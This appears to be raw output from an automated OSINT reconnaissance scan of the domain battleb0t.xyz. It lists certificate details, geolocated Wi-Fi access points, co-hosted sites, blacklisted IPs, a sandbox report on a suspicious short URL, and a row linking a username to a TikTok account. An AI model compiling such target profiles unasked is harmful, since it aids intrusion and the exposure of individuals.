Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 27 01:19:20 2022 GMT
Not After : Mar 27 01:19:19 2023 GMT
Subject: CN=battleb0t.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:ab:c7:1b:0c:ed:c6:01:f8:ea:a9:b3:cf:08:17:
4f:a2:cb:7c:34:c4:66:12:e6:ef:f3:98:17:79:c9:
65:ee:66:4c:1f:9a:92:7d:33:ee:07:fa:2e:15:62:
f7:b4:f3:1f:d5:4f:2e:b1:67:a8:49:42:bf:e3:cc:
9a:b7:30:46:c2:68:f5:28:a9:64:69:6f:4c:4b:64:
24:c9:dc:ed:46:9f:a4:1f:c2:ef:6f:36:d0:bc:69:
27:b8:e2:d6:18:70:40:2c:b4:f5:ee:8f:f7:0d:8c:
6e:03:92:e7:5d:d6:3e:bc:bb:c9:5b:28:10:a0:5a:
f6:37:f5:e1:9e:15:23:72:6e:8e:69:01:09:a4:8c:
a4:c9:d7:db:05:01:90:48:4b:90:20:8c:38:7a:0a:
60:74:79:18:26:30:8e:60:0b:17:b9:24:a0:80:df:
3f:14:00:d3:09:e7:34:47:35:63:7c:54:d2:a0:9d:
e1:57:d1:cb:13:d3:3c:30:24:97:8e:ea:34:00:9f:
cc:6c:0c:6a:f7:54:bc:5e:60:dc:46:31:c2:09:de:
d9:c3:e3:63:1e:8f:1c:c5:90:90:e8:da:86:be:7d:
f1:c3:1f:1a:86:69:9b:0b:e0:b2:0c:47:08:c8:92:
59:2b:66:2f:fa:a1:38:a1:2f:10:65:f6:97:fd:16:
87:33
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
63:4E:15:85:56:5A:A4:94:02:C2:16:42:A4:A5:97:9A:38:02:57:97
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:battleb0t.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate SCTs:
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : AD:F7:BE:FA:7C:FF:10:C8:8B:9D:3D:9C:1E:3E:18:6A:
B4:67:29:5D:CF:B1:0C:24:CA:85:86:34:EB:DC:82:8A
Timestamp : Dec 27 02:19:21.033 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:46:02:21:00:84:8B:29:D3:64:84:A1:88:50:9E:D3:
9D:A2:EF:43:30:D4:86:D3:E7:90:33:F8:14:58:7B:CF:
3D:0B:35:99:AF:02:21:00:F5:19:F9:97:83:47:D5:29:
CD:26:D1:57:6A:23:AA:62:7D:CE:2C:FB:A1:20:B8:FD:
9C:0C:85:75:32:C7:61:39
Signed Certificate Timestamp:
Version : v1 (0x0)
Log ID : 7A:32:8C:54:D8:B7:2D:B6:20:EA:38:E0:52:1E:E9:84:
16:70:32:13:85:4D:3B:D2:2B:C1:3A:57:A3:52:EB:52
Timestamp : Dec 27 02:19:21.513 2022 GMT
Extensions: none
Signature : ecdsa-with-SHA256
30:44:02:20:2A:8C:77:97:5A:9C:CA:1E:7D:0B:BB:90:
03:7D:66:BB:14:11:F7:DD:60:15:1B:74:54:65:58:17:
74:A3:82:F5:02:20:39:E0:01:B6:95:4D:B6:CD:8E:C1:
7B:5C:40:66:7A:40:6C:AF:84:AE:EB:32:D3:B7:97:42:
AD:31:F6:EA:DE:DF
Signature Algorithm: sha256WithRSAEncryption
28:6a:7b:fe:38:78:7b:21:c1:3b:3c:3f:d1:b4:61:2f:4e:f1:
da:92:46:31:44:1e:96:07:8b:dc:eb:28:ff:3b:d6:1e:71:c7:
04:81:de:c1:70:36:5f:a2:02:f0:0b:40:36:a9:26:40:5d:c9:
c5:74:71:85:41:ef:c7:6e:ec:6a:1e:90:c8:99:9e:b1:d7:35:
41:13:e3:8a:bb:a5:ed:b5:98:88:d3:24:fa:09:85:ca:86:91:
19:75:26:77:c5:e4:a7:a0:79:97:6e:2c:61:98:30:e5:11:ef:
4f:4f:76:31:95:ae:e6:0d:81:77:d6:68:98:ce:73:96:15:48:
9d:14:5f:98:61:fa:ea:76:c3:0c:1b:37:61:99:3c:2f:f6:e9:
73:46:98:a8:d6:36:63:fb:2a:24:e5:21:23:a5:d5:ad:34:e6:
c6:77:ad:af:49:43:09:52:9e:99:db:64:76:6f:f4:5e:ef:74:
7d:dc:e5:8a:5b:9f:ad:b1:5b:08:f3:ee:23:71:80:2c:ba:37:
2a:d1:cd:84:da:80:7c:ee:4b:32:65:01:30:f2:ea:6d:dc:e7:
31:d4:da:65:2d:de:fc:fd:7f:14:3a:b7:19:62:cd:de:44:e0:
8f:e2:7f:df:7c:67:e1:b0:69:e7:56:94:c1:5b:8c:c0:84:4a:
a0:80:54:7f
| battleb0t.xyz |
| 2023-05-12 03:24:48 | Country | No | Country Name Extractor | 0 | 0 | 3 | 0 | None | United States | Rosemont, Illinois, 60018, United States, North America |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:06:25:57:9F:CA) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | ATTDGsRAys (Net ID: 88:96:4E:86:44:00) | 37.751, -97.822 |
| 2023-05-12 03:32:52 | Non-Standard HTTP Header | No | Strange Header Identifier | 0 | 0 | 3 | 0 | None | cross-origin-resource-policy: same-origin | {"content-encoding": "gzip", "nel": "{\"success_fraction\":0,\"report_to\":\"cf-nel\",\"max_age\":604800}", "referrer-policy": "same-origin", "permissions-policy": "accelerometer=(),autoplay=(),camera=(),clipboard-read=(),clipboard-write=(),fullscreen=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()", "cross-origin-resource-policy": "same-origin", "transfer-encoding": "chunked", "alt-svc": "h3=\":443\"; ma=86400, h3-29=\":443\"; ma=86400", "expires": "Thu, 01 Jan 1970 00:00:01 GMT", "vary": "Accept-Encoding", "server": "cloudflare", "connection": "close", "report-to": "{\"endpoints\":[{\"url\":\"https:\\/\\/a.nel.cloudflare.com\\/report\\/v3?s=jsIMdWNoCwdQGyyZGyYA%2Bk%2F%2FuxOwhAu2H4z%2BlgqTotxGWPo8hqWsqluH0WQNJMNDxGIz%2FauzgzXUlj2TX7zY2FcfHDEdJ6DQfKAJa9S%2BlmMzgJ2oNDB%2FfptzTg%3D%3D\"}],\"group\":\"cf-nel\",\"max_age\":604800}", "cf-mitigated": "challenge", "cache-control": "private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0", "date": "Fri, 12 May 2023 03:24:22 GMT", "x-frame-options": "SAMEORIGIN", "cross-origin-embedder-policy": "require-corp", "content-type": "text/html; charset=UTF-8", "cf-ray": "7c5f8c5e7988238a-EWR", "cross-origin-opener-policy": "same-origin"} |
| 2023-05-12 03:18:51 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | NETGEAR48 (Net ID: B0:39:56:06:50:02) | 37.751, -97.822 |
| 2023-05-12 02:45:35 | Internet Name | No | DNSDumpster | 0 | 0 | 1 | 0 | None | oldfluid.battleb0t.xyz | battleb0t.xyz |
| 2023-05-12 03:00:53 | Co-Hosted Site | No | HackerTarget | 2 | 0 | 2 | 0 | None | 000yesnt.github.io | 185.199.111.153 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | linksys (Net ID: 00:04:5A:EB:D7:15) | 33.336199,-111.89446440830702 |
| 2023-05-12 03:17:05 | Account on External Site | No | Account Finder | 0 | 0 | 1 | 0 | None | TikTok (Category: social)
https://www.tiktok.com/@ayshoo?lang=en | ayshoo |
| 2023-05-12 02:56:46 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 3 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': [{u'url': u'http://reurl.cc/4xdkky', u'type': u'extracted', u'verdict': u'suspicious'}]}, u'total_processes': 3, u'threat_score': 35, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': None, u'submit_name': u'https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared', u'signatures': [{u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-1', u'name': u'Contacts server', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"54.82.57.202:443"\n "54.231.160.113:443"\n "35.229.48.116:443"\n "104.16.123.175:443"\n "34.196.48.118:443"'}, {u'category': u'General', u'origin': u'File/Memory', u'identifier': u'string-127', u'name': u'Found user-agent related strings', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/001', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.001', u'relevance': 1, u'threat_level': 0, u'type': 2, u'description': u'"GET /resources/63363db12399455d8f5fde07946c0dd3?shared HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /resources/63363db12399455d8f5fde07946c0dd3?shared HTTP/1.1\nAccept: text/html, application/xhtml+xml, */*\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /main.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /main.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.js HTTP/1.1\nAccept: application/javascript, */*;q=0.8\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /standard.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /standard.94ce4fbb3fdb7e2758a9e018cc35e9c14e00b838.css HTTP/1.1\nAccept: text/css, */*\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nAccept-Encoding: gzip, deflate\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/feature-flags HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/feature-flags HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/client-config HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/client-config HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /favicon.ico HTTP/1.1\nAccept: */*\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/resources/63363db12399455d8f5fde07946c0dd3/reviews HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/resources/63363db12399455d8f5fde07946c0dd3/reviews HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/licenses HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/licenses HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")\n "GET /api/resources/63363db12399455d8f5fde07946c0dd3 HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "mozilla/5.0 (")\n "GET /api/resources/63363db12399455d8f5fde07946c0dd3 HTTP/1.1\nAccept: */*\nContent-Type: application/json\nx-session-id: undefined\nReferer: https://lor.instructure.com/resources/63363db12399455d8f5fde07946c0dd3?shared\nAccept-Language: en-US\nAccept-Encoding: gzip, deflate\nUser-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko\nHost: lor.instructure.com\nDNT: 1\nConnection: Keep-Alive" (Indicator: "user-agent: ")'}, {u'category': u'General', u'origin': u'Created Mutant', u'identifier': u'mutant-0', u'name': u'Creates mutants', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 3, u'threat_level': 0, u'type': 4, u'description': u'"\\Sessions\\1\\BaseNamedObjects\\UpdatingNewTabPageData"\n "Local\\InternetShortcutMutex"\n "Local\\ZonesCacheCounterMutex"\n "{5312EE61-79E3-4A24-BFE1-132B85B23C3A}"\n "UpdatingNewTabPageData"\n "{66D0969A-1E86-44CF-B4EC-3806DDDA3B5D}"\n "IsoScope_f4c_IESQMMUTEX_0_519"\n "IsoScope_f4c_IESQMMUTEX_0_303"\n "IsoScope_f4c_IESQMMUTEX_0_331"\n "Local\\VERMGMTBlockListFileMutex"\n "IsoScope_f4c_IE_EarlyTabStart_0xcec_Mutex"\n "Local\\URLBLOCK_HASHFILESWITCH_MUTEX"\n "IsoScope_f4c_ConnHashTable<3916>_HashTable_Mutex"\n "Local\\!BrowserEmulation!SharedMemory!Mutex"\n "Local\\URLBLOCK_FILEMAPSWITCH_MUTEX_3916"\n "Local\\URLBLOCK_DOWNLOAD_MUTEX"\n "Local\\ZonesLockedCacheCounterMutex"\n "\\Sessions\\1\\BaseNamedObjects\\IsoScope_f4c_IESQMMUTEX_0_519"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\!BrowserEmulation!SharedMemory!Mutex"\n "\\Sessions\\1\\BaseNamedObjects\\Local\\VERMGMTBlockListFileMutex"'}, {u'category': u'General', u'origin': u'Network Traffic', u'identifier': u'network-51', u'name': u'Queries DNS server', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1071/004', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1071.004', u'relevance': 1, u'threat_level': 0, u'type': 7, u'description': u'"lor.instructure.com"'}, {u'category': u'General', u'origin': u'Binary File', u'identifier': u'binary-16', u'name': u'Drops files marked as clean', u'attck_id_wiki': None, u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': None, u'relevance': 10, u'threat_level': 0, u'type': 8, u'description': u'Antivirus vendors marked dropped file "urlblockindex_1_.bin" as clean (type is "data")'}, {u'category': u'Unusual Characteristics', u'origin': u'Binary File', u'id | 35.229.48.116 |
| 2023-05-12 03:01:22 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.198): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | zoom2888 (Net ID: 00:01:38:85:BD:9E) | 37.780462,-122.390564 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | myLGNet (Net ID: 00:01:36:45:9F:3A) | 34.0544, -118.244 |
| 2023-05-12 03:00:52 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.81): Search Engine
Last Activity: 0 days ago
Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | lcgteach (Net ID: 00:0B:86:22:0F:30) | 33.6170672,-111.90564645297056 |
| 2023-05-12 03:18:49 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 3 | 0 | None | <no ssid> (Net ID: 00:02:2D:6A:57:0B) | 34.0544, -118.244 |
| 2023-05-12 03:18:57 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Apple Network 3668a9 (Net ID: 00:02:2D:00:C6:8F) | 37.780462,-122.390564 |
| 2023-05-12 03:09:28 | SSL Certificate - Issued to | No | SSL Certificate Analyzer | 0 | 0 | 3 | 0 | None | CN=donation.ecash-pay.com | 165.232.113.85 |
| 2023-05-12 03:03:18 | Internet Name - Unresolved | No | DNS Resolver | 0 | 0 | 2 | 0 | None | mail.ayhu.xyz | Certificate:
Data:
Version: 3 (0x2)
Serial Number:
04:7b:a3:67:f4:76:b8:d0:86:bd:aa:81:68:7c:78:c6:53:24
Signature Algorithm: sha256WithRSAEncryption
Issuer: C=US, O=Let's Encrypt, CN=R3
Validity
Not Before: Dec 13 18:07:07 2022 GMT
Not After : Mar 13 18:07:06 2023 GMT
Subject: CN=ayhu.xyz
Subject Public Key Info:
Public Key Algorithm: rsaEncryption
RSA Public-Key: (2048 bit)
Modulus:
00:f3:5c:50:fa:14:e0:3f:8b:c6:63:22:13:37:d5:
cb:b8:bd:8b:1e:a5:6b:3e:a7:72:86:59:28:5c:40:
8b:1c:f8:2f:50:4b:f5:ef:0d:c5:e9:de:f9:20:da:
78:1c:0d:66:f9:dc:3f:93:0b:74:ad:7f:b2:a1:7a:
56:57:3c:77:28:5a:1a:58:66:08:52:f6:b9:f7:00:
cb:6d:f6:d8:ce:be:b0:7d:24:54:62:4e:58:7b:85:
b9:a9:b7:ac:6a:8d:99:a5:06:fd:0d:b0:88:77:c4:
1e:ca:a9:28:8a:9d:40:a2:d0:47:0a:5a:ad:c2:3d:
86:b0:bc:4e:c3:7b:51:cd:65:3e:10:7e:3b:3a:f9:
c4:70:b5:67:78:ac:bb:4f:31:b9:51:1b:63:89:e0:
2e:5b:c6:8b:52:39:42:6a:aa:6d:6c:72:68:d0:4f:
7c:c9:6a:0a:9c:f8:75:aa:50:d4:8d:ce:7f:ca:28:
87:8a:b7:bc:e2:04:a3:9b:bd:0d:fe:95:0c:de:fb:
3a:e4:bd:4d:5a:d2:f2:ba:0e:54:6d:82:9a:5c:f9:
ee:f6:a3:1e:93:71:37:5f:83:bf:08:49:75:e7:cf:
fc:13:fc:3c:21:17:a8:95:ac:1a:b0:0b:09:b4:ce:
a6:d7:8e:cb:8b:5e:2f:81:f3:69:1e:af:dd:1c:d1:
d3:27
Exponent: 65537 (0x10001)
X509v3 extensions:
X509v3 Key Usage: critical
Digital Signature, Key Encipherment
X509v3 Extended Key Usage:
TLS Web Server Authentication, TLS Web Client Authentication
X509v3 Basic Constraints: critical
CA:FALSE
X509v3 Subject Key Identifier:
BE:C4:2E:77:A7:91:6D:C0:9E:C0:E1:04:BD:9C:50:CA:0E:A6:9A:78
X509v3 Authority Key Identifier:
keyid:14:2E:B3:17:B7:58:56:CB:AE:50:09:40:E6:1F:AF:9D:8B:14:C2:C6
Authority Information Access:
OCSP - URI:http://r3.o.lencr.org
CA Issuers - URI:http://r3.i.lencr.org/
X509v3 Subject Alternative Name:
DNS:ayhu.xyz, DNS:mail.ayhu.xyz, DNS:www.ayhu.xyz
X509v3 Certificate Policies:
Policy: 2.23.140.1.2.1
Policy: 1.3.6.1.4.1.44947.1.1.1
CPS: http://cps.letsencrypt.org
CT Precertificate Poison: critical
NULL
Signature Algorithm: sha256WithRSAEncryption
56:a7:32:cc:63:2f:7b:45:7f:05:18:5f:3e:03:67:82:e5:0e:
14:24:2d:4e:bd:24:f5:fa:90:92:69:17:7b:d1:23:b4:5f:72:
7a:af:32:e2:c8:28:7e:98:41:f2:c7:ab:41:34:02:6f:ca:a4:
77:0e:6b:df:35:1b:69:e8:30:42:43:a2:b1:d9:fd:cb:17:1e:
46:a3:67:c9:5d:ff:94:85:0e:a2:df:d3:83:d0:a3:f2:83:7b:
dd:2e:d5:ae:32:94:05:46:0c:19:ca:ed:27:24:30:de:c1:83:
b3:fa:a9:28:10:06:41:f9:bc:8e:ec:2c:b2:c5:50:1b:53:d4:
5f:dc:93:4c:91:47:36:3e:18:bb:60:2e:2b:c3:a2:8e:d0:41:
bf:b5:f2:c1:3c:9e:23:83:f3:0a:e9:90:b8:ea:07:4c:7d:33:
7f:96:41:8c:3e:17:1d:9e:ed:d7:88:e1:f2:d6:4c:ee:67:b7:
9d:77:dd:54:17:a0:45:80:3c:14:ae:d9:2c:f9:2f:a7:d3:1a:
b6:ff:c0:51:b2:15:42:38:03:d0:4b:ff:c0:3f:6d:02:65:07:
67:bb:0a:98:60:da:ab:a9:72:b1:8d:b2:e0:ad:99:f8:08:b9:
1a:39:e6:69:82:23:94:db:8e:23:77:72:cb:aa:45:70:fd:4e:
10:ce:72:06
|
| 2023-05-12 03:18:58 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 5 | 0 | None | Fly By (Net ID: 00:02:6F:5D:6C:20) | 33.336199,-111.89446440830702 |
| 2023-05-12 02:46:16 | Affiliate Description - Category | No | DuckDuckGo | 0 | 0 | 3 | 0 | None | Bug and issue tracking software | battleb0t.github.io |
| 2023-05-12 02:55:05 | HTTP Headers | No | Censys | 0 | 0 | 2 | 0 | None | {"_encoding": {"Referrer_Policy": "DISPLAY_UTF8", "Expires": "DISPLAY_UTF8", "Vary": "DISPLAY_UTF8", "Server": "DISPLAY_UTF8", "Date": "DISPLAY_UTF8", "Connection": "DISPLAY_UTF8", "Content_Type": "DISPLAY_UTF8", "Cf_Ray": "DISPLAY_UTF8", "X_Frame_Options": "DISPLAY_UTF8", "Cache_Control": "DISPLAY_UTF8"}, "Referrer_Policy": ["same-origin"], "Expires": ["Thu, 01 Jan 1970 00:00:01 GMT"], "Vary": ["Accept-Encoding"], "Server": ["cloudflare"], "Date": ["<REDACTED>"], "Connection": ["close"], "Content_Type": ["text/html; charset=UTF-8"], "Cf_Ray": ["7c5bc4bf4f0229c3-ORD"], "X_Frame_Options": ["SAMEORIGIN"], "Cache_Control": ["private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0"]} | 188.114.97.1 |
| 2023-05-12 03:33:13 | Web Content Language | No | Language Detector | 0 | 0 | 3 | 0 | None | English | <!DOCTYPE html>
<html lang="en-US">
<head>
<title>Just a moment...</title>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<meta http-equiv="X-UA-Compatible" content="IE=Edge">
<meta name="robots" content="noindex,nofollow">
<meta name="viewport" content="width=device-width,initial-scale=1">
<link href="/cdn-cgi/styles/challenges.css" rel="stylesheet">
</head>
<body class="no-js">
<div class="main-wrapper" role="main">
<div class="main-content">
<noscript>
<div id="challenge-error-title">
<div class="h2">
<span class="icon-wrapper">
<div class="heading-icon warning-icon"></div>
</span>
<span id="challenge-error-text">
Enable JavaScript and cookies to continue
</span>
</div>
</div>
</noscript>
<div id="trk_jschal_js" style="display:none;background-image:url('/cdn-cgi/images/trace/managed/nojs/transparent.gif?ray=7c5f8c594cb34339')"></div>
<form id="challenge-form" action="/lol.html?__cf_chl_f_tk=74dxVi7F6QcjSPoVNIU8T6Tlsy4wHV.ukI6aTAD9tk4-1683861861-0-gaNycGzNCiU" method="POST" enctype="application/x-www-form-urlencoded">
<input type="hidden" name="md" value="fXRp0MT2Gq_7yIcIgnBHmz4mvl642t3xYxkCV5CopVU-1683861861-0-AevD5zHzR5Nylhg7VMHylWA-UGhfY5JI7t_DZKLajlY04sfvOKhEUvL9GVGicMZplZkcd7EKnpXCooBz_psnEdyw4NmTFN3sNXxO3b2NuDlfX3fgFqIYYwxN-_ZcrgInEcSdq4ze85lgbNjmAyI7cICej2859mTsNPJTSg3Eei4MCiIEepygARCAmXkyjazT_siRWXRbIF3Yq9cQrkKvTYHjy7kA4ARUBhj3gHLsfY6ByHmcA-4oH5F_BMaNFfn83ZbE-O4HF1luYDVMX4jN2SY5BFBmGirV5lQE7nc2ET_G_HywU7GlMXbT0JmkojLsvRDxpqP_ZBtz_vJHbi4FUOHHRaxbF6WI1ct7U2kIlltKjNHrBNnSQ1zRICZ4xPEiXCRFEqv1mvMk_vuWumbRs70YeoiNBWGJjw9SNPC0qRv0_rQzWEhzAZCr9GR45Pyn22x2UzlVIl478oJoBXIxbm7A_QBYYHzFjMNgE8pR4rE43z-LkzbfZp4Mrz4ipAVKmZJGkf2Y5B_9TlYOJXKMjDFy4LD0ELxkw1-R_QW_mLtVmznveG5c9m2IZ2zQV1cn4H8j5Bc1iY811MUNVsmFG0JD-DYsguU4LRfDkaOmbWCSaJ34wnyswYZY6vuAq7jQcIjqzclxyNRihA5I_cL6ueo4Ri5oVSncrTfIsWIYMESFPA-cZy_mtxt3SdM8IrciE1x1sYi06n9I6prGHl0s-4QNR7JVOnbdMoI28ES-j7HwNWZk4MsUxFuzUOsk5lSLsSRh-hQZxr19nktp-MvVpSzRUuSL26nuxNFkN8FTk5Ae96R-